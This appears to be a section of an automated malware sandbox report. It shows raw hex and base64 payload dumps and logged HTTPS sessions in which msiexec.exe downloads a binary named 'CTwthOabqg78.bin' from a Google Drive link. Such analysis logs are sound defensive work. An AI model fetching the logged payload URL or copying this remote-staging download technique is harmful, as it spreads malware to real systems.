                                                                2025-03-10 19:37:55 UTC4664INData Raw: 57 37 39 6b 58 4c 62 2b 65 4e 77 7a 39 65 63 35 76 68 48 78 57 4c 2b 2f 4c 46 79 45 56 52 79 6d 5a 4a 72 42 5a 52 38 4c 43 75 34 46 42 45 5a 73 35 49 50 34 53 71 76 77 58 30 66 65 55 30 78 43 77 39 56 30 38 58 35 38 42 31 41 6c 75 38 44 4c 49 64 56 79 75 55 70 36 57 59 42 74 6a 4e 50 58 58 64 56 79 39 62 30 59 51 59 42 64 42 2b 47 41 42 39 32 43 30 71 34 6c 68 48 42 6c 55 51 39 72 46 39 51 6d 6d 43 4a 4a 34 43 6e 75 6d 6e 56 75 61 42 49 34 58 66 50 71 63 45 33 79 39 6d 64 77 31 46 30 70 34 56 75 73 65 2b 47 37 44 64 52 54 4a 75 53 35 63 72 44 56 63 63 49 54 69 45 32 41 58 74 6e 49 55 59 45 44 48 34 68 37 58 5a 53 63 70 4a 7a 30 44 66 61 6e 31 53 49 37 58 2f 4b 76 79 7a 4a 43 42 6f 5a 59 71 4b 6d 67 56 54 73 56 51 71 47 6c 5a 50 7a 79 50 49 33 56 5a 59 36
                                                                Data Ascii: W79kXLb+eNwz9ec5vhHxWL+/LFyEVRymZJrBZR8LCu4FBEZs5IP4SqvwX0feU0xCw9V08X58B1Alu8DLIdVyuUp6WYBtjNPXXdVy9b0YQYBdB+GAB92C0q4lhHBlUQ9rF9QmmCJJ4CnumnVuaBI4XfPqcE3y9mdw1F0p4Vuse+G7DdRTJuS5crDVccITiE2AXtnIUYEDH4h7XZScpJz0Dfan1SI7X/KvyzJCBoZYqKmgVTsVQqGlZPzyPI3VZY6
                                                                2025-03-10 19:37:55 UTC1324INData Raw: 4b 6e 41 64 6b 72 31 75 62 63 48 51 6e 52 57 33 67 6a 49 42 62 55 68 79 6b 4b 51 67 41 43 71 72 33 31 67 59 6d 68 72 51 75 34 48 4b 62 58 50 32 4f 76 4e 51 62 6c 34 67 75 5a 4b 2b 73 76 4c 32 6a 65 50 36 30 56 74 61 5a 41 72 54 55 79 61 55 68 51 46 2b 31 58 48 38 7a 72 54 73 67 48 62 55 6a 2b 45 52 33 59 45 43 4d 68 6d 7a 62 67 4d 65 72 42 33 4c 37 4f 39 65 33 59 72 36 42 34 33 5a 48 39 4b 4a 62 6d 72 68 4f 75 55 55 56 6f 4b 59 70 72 6e 47 33 54 35 7a 6e 6c 53 44 76 76 74 79 71 67 6e 4e 37 55 6e 49 61 66 30 43 38 4a 78 54 6c 32 59 64 6c 55 74 78 31 47 38 43 36 4f 47 6d 71 67 73 56 56 61 38 72 5a 39 72 61 55 30 69 49 6b 72 2b 2f 71 61 37 4a 4b 58 35 78 64 39 31 77 64 59 2f 51 75 36 63 64 4c 32 2f 6c 2b 58 49 4e 41 76 5a 39 71 39 4f 52 48 61 50 71 55 62 50
                                                                Data Ascii: KnAdkr1ubcHQnRW3gjIBbUhykKQgACqr31gYmhrQu4HKbXP2OvNQbl4guZK+svL2jeP60VtaZArTUyaUhQF+1XH8zrTsgHbUj+ER3YECMhmzbgMerB3L7O9e3Yr6B43ZH9KJbmrhOuUUVoKYprnG3T5znlSDvvtyqgnN7UnIaf0C8JxTl2YdlUtx1G8C6OGmqgsVVa8rZ9raU0iIkr+/qa7JKX5xd91wdY/Qu6cdL2/l+XINAvZ9q9ORHaPqUbP
                                                                2025-03-10 19:37:55 UTC1342INData Raw: 4e 65 75 68 41 73 62 4b 42 63 55 62 7a 75 35 38 2f 6d 37 47 41 76 4e 4e 61 2f 41 56 48 61 59 59 32 42 4f 47 41 76 4e 31 56 7a 62 52 48 61 62 66 47 69 66 51 31 5a 30 56 73 6f 49 58 41 64 46 37 64 34 66 55 71 74 39 4b 48 4e 66 41 47 36 50 55 57 69 2b 70 41 4a 64 70 46 77 58 63 62 5a 66 30 50 51 6d 6c 76 37 37 57 35 4b 4e 57 58 44 77 38 6c 7a 78 75 4f 36 34 76 7a 39 43 66 70 4b 44 64 5a 36 57 57 32 56 5a 51 35 34 5a 68 38 6c 61 45 31 48 5a 71 65 75 33 73 45 41 7a 66 54 4d 70 77 6c 72 56 58 67 69 2b 72 64 5a 62 48 49 42 38 75 6f 2f 2f 34 48 38 32 76 64 79 58 33 63 53 6d 2f 58 2f 41 35 43 4c 7a 75 56 6f 4d 42 7a 65 31 6e 7a 71 45 4a 41 76 43 70 68 38 41 72 48 62 30 4f 65 75 45 6a 43 67 6a 4b 39 61 2b 4a 4c 2b 6d 6f 69 76 33 70 36 43 76 58 50 74 79 2b 71 62 71
                                                                Data Ascii: NeuhAsbKBcUbzu58/m7GAvNNa/AVHaYY2BOGAvN1VzbRHabfGifQ1Z0VsoIXAdF7d4fUqt9KHNfAG6PUWi+pAJdpFwXcbZf0PQmlv77W5KNWXDw8lzxuO64vz9CfpKDdZ6WW2VZQ54Zh8laE1HZqeu3sEAzfTMpwlrVXgi+rdZbHIB8uo//4H82vdyX3cSm/X/A5CLzuVoMBze1nzqEJAvCph8ArHb0OeuEjCgjK9a+JL+moiv3p6CvXPty+qbq
                                                                2025-03-10 19:37:55 UTC1342INData Raw: 53 58 4e 71 47 39 45 36 78 4e 36 35 4a 74 6c 53 79 5a 78 53 54 56 74 79 58 59 72 72 42 70 7a 2b 2b 74 69 33 36 55 41 76 4c 48 55 67 6d 48 48 61 66 54 78 54 6b 78 41 75 71 35 45 30 34 69 7a 63 67 4b 34 4a 56 4e 48 6a 68 55 4b 61 55 47 30 71 33 62 67 2f 5a 48 4b 53 4a 50 72 74 74 59 64 4b 31 54 76 4a 6d 69 42 45 4a 65 5a 4e 33 2b 65 76 62 2b 74 4f 4f 77 2f 58 63 64 69 42 34 56 78 61 54 6d 4f 44 51 55 31 52 48 49 4d 72 72 4a 78 54 49 43 2b 37 47 6e 32 41 36 64 53 74 30 42 6e 46 53 44 41 5a 78 55 67 77 47 63 56 49 4d 42 6e 46 53 44 41 5a 78 55 67 77 47 63 56 49 4f 77 64 56 69 45 61 69 45 6c 41 69 32 34 6b 49 70 4a 33 74 57 33 4a 59 34 51 77 69 50 4b 36 74 43 76 45 69 41 43 39 32 41 7a 6c 49 6b 64 6f 69 75 65 56 2f 51 43 39 34 72 52 53 75 63 64 6b 6d 77 73 2b
                                                                Data Ascii: SXNqG9E6xN65JtlSyZxSTVtyXYrrBpz++ti36UAvLHUgmHHafTxTkxAuq5E04izcgK4JVNHjhUKaUG0q3bg/ZHKSJPrttYdK1TvJmiBEJeZN3+evb+tOOw/XcdiB4VxaTmODQU1RHIMrrJxTIC+7Gn2A6dSt0BnFSDAZxUgwGcVIMBnFSDAZxUgwGcVIOwdViEaiElAi24kIpJ3tW3JY4QwiPK6tCvEiAC92AzlIkdoiueV/QC94rRSucdkmws+
                                                                2025-03-10 19:37:55 UTC1342INData Raw: 38 68 6a 50 33 5a 4b 70 54 56 55 30 63 71 58 4a 44 6a 4b 72 75 36 77 68 48 76 63 42 49 4c 76 2b 30 67 36 64 67 57 57 74 32 44 6c 57 44 4e 43 36 61 6e 53 54 43 52 32 2f 36 4c 73 71 61 67 4c 79 31 36 55 38 35 52 32 58 67 5a 4b 46 68 67 6f 53 74 70 74 74 70 5a 77 69 50 59 78 4b 30 75 46 45 65 6f 2f 75 59 5a 36 54 48 4c 64 71 43 54 46 74 44 6e 34 2b 50 75 33 4e 6a 66 65 31 78 6e 71 39 33 58 75 77 33 46 48 54 6b 6c 78 2b 44 39 47 37 53 44 36 63 6c 68 32 6d 6e 68 70 4a 41 41 4c 44 70 57 43 6c 2b 78 32 6d 47 43 56 73 36 51 6f 44 44 4e 58 69 79 30 77 58 56 6e 42 65 62 57 64 44 58 43 69 4f 48 4a 2b 33 61 77 76 68 46 46 4f 30 46 2b 30 37 38 72 59 6f 4f 4c 67 66 4e 55 4f 2b 46 31 51 75 76 38 61 54 77 41 32 65 56 49 4d 42 79 75 71 4f 42 49 30 71 41 76 65 53 32 4a 44
                                                                Data Ascii: 8hjP3ZKpTVU0cqXJDjKru6whHvcBILv+0g6dgWWt2DlWDNC6anSTCR2/6LsqagLy16U85R2XgZKFhgoStpttpZwiPYxK0uFEeo/uYZ6THLdqCTFtDn4+Pu3Njfe1xnq93Xuw3FHTklx+D9G7SD6clh2mnhpJAALDpWCl+x2mGCVs6QoDDNXiy0wXVnBebWdDXCiOHJ+3awvhFFO0F+078rYoOLgfNUO+F1Quv8aTwA2eVIMByuqOBI0qAveS2JD
                                                                2025-03-10 19:37:55 UTC1342INData Raw: 43 41 62 69 75 47 32 6d 4d 47 4f 65 77 75 34 52 79 41 62 68 4a 68 59 6f 76 56 63 56 74 50 67 67 75 49 72 6e 64 6e 42 6c 6b 5a 63 30 2b 63 55 59 75 72 44 58 6c 59 6e 56 46 59 35 30 69 5a 4a 62 31 4d 4a 44 5a 48 76 78 74 47 34 32 53 54 79 4f 49 73 58 7a 4e 76 2b 63 39 5a 76 31 76 4f 6d 42 54 36 79 57 4c 33 6a 58 4c 71 4d 78 51 6b 2f 58 4a 79 62 31 4f 58 69 47 42 70 32 57 41 52 59 58 6b 51 4c 65 4e 47 4e 2f 74 70 30 4f 6c 63 30 51 69 55 43 31 57 44 41 63 76 72 35 43 5a 6e 66 67 4c 32 71 4b 2f 30 52 52 32 6a 4a 57 4d 44 6a 51 4c 32 2b 35 55 2f 64 78 32 54 6a 64 37 4d 61 67 6f 47 6a 50 49 53 46 31 6b 79 36 67 48 4e 68 78 32 4e 78 4e 5a 52 49 53 6c 64 65 6d 4b 55 45 6c 6f 55 38 36 49 33 68 6b 7a 32 74 71 76 6f 46 5a 79 38 77 36 76 32 4a 5a 4e 56 51 5a 2b 63 56
                                                                Data Ascii: CAbiuG2mMGOewu4RyAbhJhYovVcVtPgguIrndnBlkZc0+cUYurDXlYnVFY50iZJb1MJDZHvxtG42STyOIsXzNv+c9Zv1vOmBT6yWL3jXLqMxQk/XJyb1OXiGBp2WARYXkQLeNGN/tp0Olc0QiUC1WDAcvr5CZnfgL2qK/0RR2jJWMDjQL2+5U/dx2Tjd7MagoGjPISF1ky6gHNhx2NxNZRISldemKUEloU86I3hkz2tqvoFZy8w6v2JZNVQZ+cV
                                                                2025-03-10 19:37:55 UTC1342INData Raw: 63 6a 49 31 33 39 57 76 4a 57 4a 76 4a 76 72 4e 37 53 6d 32 54 36 63 43 77 47 41 49 72 2b 30 64 76 62 6f 53 61 56 59 43 77 43 35 48 64 69 4d 56 52 51 5a 6c 43 5a 48 79 6d 46 6d 36 4a 55 4f 53 69 4a 45 38 44 6d 5a 78 50 78 6a 4a 2f 43 6c 53 6d 42 77 7a 4b 31 34 45 72 39 79 47 32 4a 64 65 44 57 73 76 6c 46 47 44 55 69 66 46 64 38 33 69 31 57 68 62 55 63 61 46 67 48 64 6a 70 54 76 6b 41 68 2b 49 65 6c 57 64 6e 50 72 52 55 58 69 4a 45 74 6b 73 48 63 34 65 79 76 44 42 36 6c 62 7a 62 68 4d 47 4f 42 7a 57 58 57 6d 6a 57 4c 47 6d 5a 34 36 39 30 6a 48 34 73 48 55 51 4a 77 79 6b 73 71 34 61 64 65 72 6a 72 43 68 74 51 46 38 63 71 2f 4a 61 79 2b 76 79 4b 79 75 72 41 76 62 42 30 32 57 65 48 5a 4e 58 55 6a 4c 4c 30 35 30 56 74 49 6f 35 41 57 31 55 64 35 75 67 35 7a 4c
                                                                Data Ascii: cjI139WvJWJvJvrN7Sm2T6cCwGAIr+0dvboSaVYCwC5HdiMVRQZlCZHymFm6JUOSiJE8DmZxPxjJ/ClSmBwzK14Er9yG2JdeDWsvlFGDUifFd83i1WhbUcaFgHdjpTvkAh+IelWdnPrRUXiJEtksHc4eyvDB6lbzbhMGOBzWXWmjWLGmZ4690jH4sHUQJwyksq4aderjrChtQF8cq/Jay+vyKyurAvbB02WeHZNXUjLL050VtIo5AW1Ud5ug5zL
                                                                2025-03-10 19:37:55 UTC1342INData Raw: 56 32 62 58 4f 4b 4b 64 53 43 41 5a 78 62 44 6a 71 5a 56 49 4e 57 49 30 6b 43 4d 66 4c 56 62 4a 5a 64 61 4f 36 41 61 39 49 39 38 70 77 45 48 34 68 38 56 62 75 63 70 59 72 35 44 69 72 65 48 74 74 59 6c 4a 71 33 36 44 33 73 38 47 77 53 2f 49 44 66 50 33 5a 50 58 49 57 46 52 41 36 6b 4f 5a 59 57 42 6c 79 73 68 4b 73 41 6b 42 4b 6a 64 63 52 69 44 4f 58 32 58 63 74 72 58 68 58 5a 2f 41 43 63 56 44 6f 53 5a 6b 35 78 67 46 32 2b 6b 6d 43 71 42 6a 6c 63 78 7a 63 44 67 47 37 36 2f 33 34 69 31 55 48 30 79 42 42 76 67 47 34 77 37 55 30 37 31 55 46 31 63 6f 66 78 55 67 44 64 59 41 43 50 79 51 66 4b 34 31 70 62 51 62 57 2f 62 62 72 37 56 4f 33 54 65 4e 4a 57 74 4d 6f 59 51 50 70 6d 45 57 79 57 50 67 69 62 4f 53 69 50 6b 37 43 54 31 2b 30 75 32 31 41 47 79 73 65 2f 6d
                                                                Data Ascii: V2bXOKKdSCAZxbDjqZVINWI0kCMfLVbJZdaO6Aa9I98pwEH4h8VbucpYr5DireHttYlJq36D3s8GwS/IDfP3ZPXIWFRA6kOZYWBlyshKsAkBKjdcRiDOX2XctrXhXZ/ACcVDoSZk5xgF2+kmCqBjlcxzcDgG76/34i1UH0yBBvgG4w7U071UF1cofxUgDdYACPyQfK41pbQbW/bbr7VO3TeNJWtMoYQPpmEWyWPgibOSiPk7CT1+0u21AGyse/m
                                                                2025-03-10 19:37:55 UTC1342INData Raw: 62 72 53 77 53 64 46 41 44 34 44 4e 73 36 62 67 6f 56 55 53 59 79 45 6b 44 6f 6d 41 6a 70 32 4e 68 56 55 46 6d 6a 34 6f 48 66 76 5a 32 6e 44 57 75 2b 2f 43 4d 67 62 43 78 56 75 43 4d 4e 39 55 67 77 47 63 56 49 4d 42 6e 46 53 44 41 5a 78 55 67 77 47 63 56 49 4d 42 6e 46 53 44 41 5a 7a 31 51 59 31 56 45 67 37 41 37 7a 52 62 45 52 52 42 45 77 44 6e 75 57 71 72 54 69 48 37 63 4a 4e 6b 72 43 61 63 56 49 4d 42 6e 46 53 44 41 5a 78 55 67 77 47 63 56 49 4d 42 6e 46 53 44 41 5a 78 55 67 77 45 74 32 7a 2b 72 4d 69 2b 34 36 63 36 74 66 50 34 58 47 4b 63 4a 46 31 58 44 69 4a 32 59 37 37 34 44 34 51 6b 74 72 58 61 70 72 41 70 35 4d 44 52 69 4d 45 59 38 59 66 5a 68 47 66 67 57 57 57 55 45 32 41 2b 35 31 46 51 4a 6d 6d 6a 46 67 65 69 63 56 49 4d 42 6e 46 53 44 41 5a 78
                                                                Data Ascii: brSwSdFAD4DNs6bgoVUSYyEkDomAjp2NhVUFmj4oHfvZ2nDWu+/CMgbCxVuCMN9UgwGcVIMBnFSDAZxUgwGcVIMBnFSDAZz1QY1VEg7A7zRbERRBEwDnuWqrTiH7cJNkrCacVIMBnFSDAZxUgwGcVIMBnFSDAZxUgwEt2z+rMi+46c6tfP4XGKcJF1XDiJ2Y774D4QktrXaprAp5MDRiMEY8YfZhGfgWWWUE2A+51FQJmmjFgeicVIMBnFSDAZx


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                3192.168.2.549716142.250.181.2384434752C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-03-10 19:38:58 UTC216OUTGET /uc?export=download&id=1xJUHcOwTYLF4CpOb43j4CAGUq-W1-b4b HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                                                                Host: drive.google.com
                                                                Cache-Control: no-cache
                                                                2025-03-10 19:38:58 UTC1610INHTTP/1.1 303 See Other
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Mon, 10 Mar 2025 19:38:58 GMT
                                                                Location: https://drive.usercontent.google.com/download?id=1xJUHcOwTYLF4CpOb43j4CAGUq-W1-b4b&export=download
                                                                Strict-Transport-Security: max-age=31536000
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-ry373WwkV7okSpL414PalQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                4192.168.2.549717172.217.16.1934434752C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-03-10 19:39:01 UTC258OUTGET /download?id=1xJUHcOwTYLF4CpOb43j4CAGUq-W1-b4b&export=download HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                                                                Cache-Control: no-cache
                                                                Host: drive.usercontent.google.com
                                                                Connection: Keep-Alive
                                                                2025-03-10 19:39:04 UTC5012INHTTP/1.1 200 OK
                                                                X-GUploader-UploadID: AKDAyIssx_o1Ab4kLaJuDepBaAMmGcU8FK6Q79YI7MFv7e7zs8NwEnTbtApVPSFfiYAhq02x
                                                                Content-Type: application/octet-stream
                                                                Content-Security-Policy: sandbox
                                                                Content-Security-Policy: default-src 'none'
                                                                Content-Security-Policy: frame-ancestors 'none'
                                                                X-Content-Security-Policy: sandbox
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Cross-Origin-Embedder-Policy: require-corp
                                                                Cross-Origin-Resource-Policy: same-site
                                                                X-Content-Type-Options: nosniff
                                                                Content-Disposition: attachment; filename="CTwthOabqg78.bin"
                                                                Access-Control-Allow-Origin: *
                                                                Access-Control-Allow-Credentials: false
                                                                Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                Accept-Ranges: bytes
                                                                Content-Length: 498752
                                                                Last-Modified: Mon, 10 Mar 2025 08:04:28 GMT
                                                                Date: Mon, 10 Mar 2025 19:39:03 GMT
                                                                Expires: Mon, 10 Mar 2025 19:39:03 GMT
                                                                Cache-Control: private, max-age=0
                                                                X-Goog-Hash: crc32c=y/cwHg==
                                                                Server: UploadServer
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close
                                                                2025-03-10 19:39:04 UTC5012INData Raw: a4 13 59 c5 fd e4 d6 0c f1 04 d3 bc 73 3d 52 60 8f b0 79 6b 8c 6c 26 14 a2 b1 07 c4 b4 aa 64 0e 4c 90 c9 11 e4 28 a3 1a 03 d3 c7 42 67 e9 6a b6 a5 0c e9 d1 b1 d2 eb 84 a3 bc 0f cc d1 2a c6 be 12 d9 43 a2 ac e0 97 97 00 0f 02 75 5e ce fb 33 50 46 61 5a c6 e0 43 d6 4c 68 79 5b db 96 9c 97 c1 c1 b5 f0 21 03 85 85 e3 d9 c0 b8 a1 c0 d7 34 70 36 39 48 e5 41 03 28 d4 4a 39 2b 92 e3 53 cb ed 36 c6 66 9c a5 83 2f 21 91 40 3f a0 e7 52 6c cd 37 0a b5 10 8d 99 8f 8d 1a b6 b6 89 1d 2c 4f 09 a0 2e e4 2a 98 91 d4 1c f7 45 ff bf fc 71 0e f5 d6 e3 57 67 91 89 31 58 e0 6e 1d 61 d1 6d 6f 7b 73 7a bd 2f 5c 75 ba ca 8f e8 fc ac dc c2 06 14 2b ee cf 65 4a d9 ab de 9a ab e6 c3 85 b6 1e 16 8c d0 f8 f4 cd 51 9b 27 8c 19 d7 e2 55 62 44 e9 7f d1 e7 16 aa c6 c2 d9 ce eb ce 12 51 60
                                                                Data Ascii: Ys=R`ykl&dL(Bgj*Cu^3PFaZCLhy[!4p69HA(J9+S6f/!@?Rl7,O.*EqWg1Xnamo{sz/\u+eJQ'UbDQ`
                                                                2025-03-10 19:39:04 UTC4673INData Raw: 34 30 26 c8 d0 1f 85 b5 ee 14 fb e6 6e 3d 8c 22 20 bc 1f f6 70 bd 7b 46 71 70 87 dd ec 95 ed 6b e1 75 d9 79 09 85 c9 de ce b2 c6 3f f9 97 06 b8 fa f0 a3 f9 92 8d 96 81 6f 06 70 62 0e 6a e2 38 4b 63 b3 3b 80 f3 8d db 85 84 8d c8 ec 33 8f 6e 4c ce 55 5f 7c fc de 4f 5c 68 13 37 8f 39 f1 dd 41 c5 0b 86 4e fe c0 1e 16 ea 49 8a 85 cf c6 22 8c b3 9c e5 70 48 a9 28 f9 e1 a8 0b d2 5d 22 12 3f d6 9b 68 8b 34 a6 cf cf 06 6a cf 5d e6 af e6 d2 80 a8 47 8b 8a 1e 04 0c 18 b7 ad cf ae a8 cc 8c f5 ad 69 b8 22 6a 37 61 07 8e 71 02 a6 86 95 5d 83 5d 6f 05 de 62 61 72 cf 44 a7 fe c8 79 2c fd 5a c7 98 c5 b4 81 cc ec e2 be 47 d0 23 f3 ed a1 f7 22 0d 51 61 89 8b 16 b3 44 82 01 32 31 b0 c0 87 01 f2 d4 92 b7 38 b7 02 29 ec 8d fc 9b 49 9b 1f 17 82 da e3 19 42 78 96 5e 78 40 ec e6
                                                                Data Ascii: 40&n=" p{Fqpkuy?opbj8Kc;3nLU_|O\h79ANI"pH(]"?h4j]Gi"j7aq]]obarDy,ZG#"QaD218)IBx^x@
                                                                2025-03-10 19:39:04 UTC1323INData Raw: 45 61 ed 74 ee 6e be fb 7d d2 13 a4 0d d6 ab c3 b9 e1 18 06 e2 ec a8 17 d4 f7 1c a7 02 9d 5e 2d 1f 16 ed fb 2d fb cb bb 42 8d 6c 48 ce c0 20 7b 8d c4 5a ce a2 df dc 6d 15 35 31 bd ae e8 b9 76 82 56 96 80 12 ca f6 19 f3 8f 7b 1f 95 8f 4c b6 0b 1d 77 d7 f4 03 3f 4c 31 ef 0b 52 ab 0e f3 61 f7 61 2a c3 f7 e3 2a 3f ab 52 25 58 38 51 72 20 2a a9 ac dc be b1 1d e1 ec fe 03 88 26 32 48 0d b1 67 21 67 ca 49 db ff 4c 44 d5 35 9a ef e9 6e 15 8a 64 48 0a 10 a5 eb 9b 14 4d 8f 3e 68 6b 14 e6 9c 7a 75 87 f2 95 7f 4c 3b 76 55 8f c3 e4 9d ca 45 93 61 63 10 cb 0a fc d7 f8 51 86 39 48 ea 30 b8 42 63 2c a9 86 b3 98 57 4d bb 23 c3 4a 87 b4 41 dd fe 09 74 ae e7 29 84 fb 88 12 32 27 b2 98 78 78 99 6d 6a 60 96 ed d9 49 3b 01 de 79 61 a7 1b 00 ba 4d e8 ee 19 9d b3 38 df a3 4e c4
                                                                Data Ascii: Eatn}^--BlH {Zm51vV{Lw?L1Raa**?R%X8Qr *&2Hg!gILD5ndHM>hkzuL;vUEacQ9H0Bc,WM#JAt)2'xxmj`I;yaM8N
                                                                2025-03-10 19:39:04 UTC1342INData Raw: bc 86 39 0a 0f 5c ec 5e 1a 7b 26 be d0 ba 8d 50 a0 43 44 6e f0 e2 d3 3f a8 3a 73 32 06 62 6c c8 c6 ac 96 f2 41 7c 14 f0 ac 04 7a f1 9c d9 1f c0 41 ef 4c cf 70 24 65 8b d8 da 6a 6d b6 d0 bb 40 1e 6e 3a 25 e9 dc b4 1f 46 62 5c 31 2e 07 fc 84 a4 d7 dd 42 7f 41 a0 26 bb 14 31 6a f9 6f 8f c4 1d 83 65 b1 cb 34 33 f5 27 0f 07 67 e8 ea 09 df de 26 3b 7e 67 00 64 98 a4 88 98 e9 fc 9d 9b 54 28 42 e9 53 bb ce b5 0e f6 3a 6a 25 86 81 b9 90 30 6a 23 1d 22 50 01 6b ea d4 05 cc 1f c1 a4 79 90 0b 83 7a f0 22 2a fb d5 a9 42 b3 45 05 67 06 5f 9b 94 8b 83 96 e9 fb 00 f6 4f 12 2d 42 f7 40 e9 15 5b 32 fa 49 08 49 a5 84 72 da a4 5f 2e 83 3c ec 93 a9 e5 2d e0 b8 7e 71 45 5c 10 3f 55 7c b9 b4 60 1e be 03 26 0e 38 db d7 63 9e 55 33 af 21 30 7c 3b b2 c3 c2 5a f4 7c 63 8c 7d f8 da
                                                                Data Ascii: 9\^{&PCDn?:s2blA|zALp$ejm@n:%Fb\1.BA&1joe43'g&;~gdT(BS:j%0j#"Pkyz"*BEg_O-B@[2IIr_.<-~qE\?U|`&8cU3!0|;Z|c}
                                                                2025-03-10 19:39:04 UTC1342INData Raw: 70 d0 6c cd b6 1f e0 1f 5c e0 e3 59 45 f1 3d e2 33 67 e2 30 60 bc 2c 73 41 40 5a 41 67 89 8f 25 57 c8 9d e9 b8 05 5b 85 62 86 35 2f 14 aa 08 7f 42 19 85 ce e2 99 aa f6 e4 f7 3b b4 60 b2 92 f9 0a dc e7 5a 61 ad 37 0b f6 bd 1e 11 07 b1 39 d4 15 07 5d c9 86 20 ca 6c 68 c8 f8 d3 7a 05 2d ae cf f1 ef 89 c9 9b df 61 64 9f 00 e8 ee e7 79 48 7c a1 4a 77 a4 01 36 be 65 c2 9a 03 a2 50 c4 47 89 b3 36 2a 1f e5 be 68 21 e5 91 d4 12 4b 48 6a 42 45 c4 77 45 98 dd 14 76 5a f4 ca 4e 78 62 98 f6 00 35 de 54 75 94 e4 38 13 29 55 e6 4c 56 3b d4 c1 f4 cc 20 51 13 b0 b0 a1 54 34 dc e6 2c 7f 9f 12 74 eb a0 6e 24 16 2a 9d 44 04 df e6 9b 6c c2 0f c3 88 37 81 42 ff 2c cf dd 79 9b 69 c2 a3 9d 1d 89 50 83 81 5a f3 8e a2 45 18 9c ac be 28 62 a5 83 cf 59 51 6c bd e3 c4 5a 58 11 20 0c
                                                                Data Ascii: pl\YE=3g0`,sA@ZAg%W[b5/B;`Za79] lhz-adyH|Jw6ePG6*h!KHjBEwEvZNxb5Tu8)ULV; QT4,tn$*Dl7B,yiPZE(bYQlZX
                                                                2025-03-10 19:39:04 UTC1342INData Raw: 4d ea f6 60 89 3f fa 35 1a 65 fd b2 d3 80 b4 b0 5f b3 0c 08 7a 2d 79 22 81 8f 11 6e bf 6d e1 6e f4 e6 fa 23 4a cc 20 36 1a 3d 19 e7 7a 72 5f e9 e0 d4 53 eb 39 03 c8 bf 65 6e 75 57 39 f1 f0 86 63 a1 cb 1c f0 3a 5d ea 7d b8 cf e7 ea e8 83 ac 26 40 72 6b c9 bc f3 f1 00 e0 c9 a5 10 8b fa 27 6b 8c dd f1 bf 3e aa 94 d1 75 65 ce 74 5d 96 57 aa fe ce 89 08 9c 80 6e a5 2a b2 60 b9 f0 31 11 9b a4 33 87 b1 dd 69 54 92 69 c5 d6 c6 33 81 ce e1 8f 5a 4c 71 84 c9 a5 68 0c a6 87 ad da d3 e7 32 7a fa 9a c9 03 88 72 c9 d4 28 65 e3 7e 1b e5 c2 4b 63 31 4d b2 23 8f 66 fb 63 1c ab c3 fb ee 7c 32 fe 9f 2d b1 55 ed 80 15 10 8f 68 82 f9 79 6e 96 66 d4 9d 6b 7f bc 0f 67 b7 b3 fe fc a0 5f 86 6f 29 8c 7f 1f 9a 24 43 64 f7 dc a0 42 ae 5c 2a 1b 81 bf a4 c8 98 95 af f3 b3 68 c8 72 d7
                                                                Data Ascii: M`?5e_z-y"nmn#J 6=zr_S9enuW9c:]}&@rk'k>uet]Wn*`13iTi3ZLqh2zr(e~Kc1M#fc|2-Uhynfkg_o)$CdB\*hr
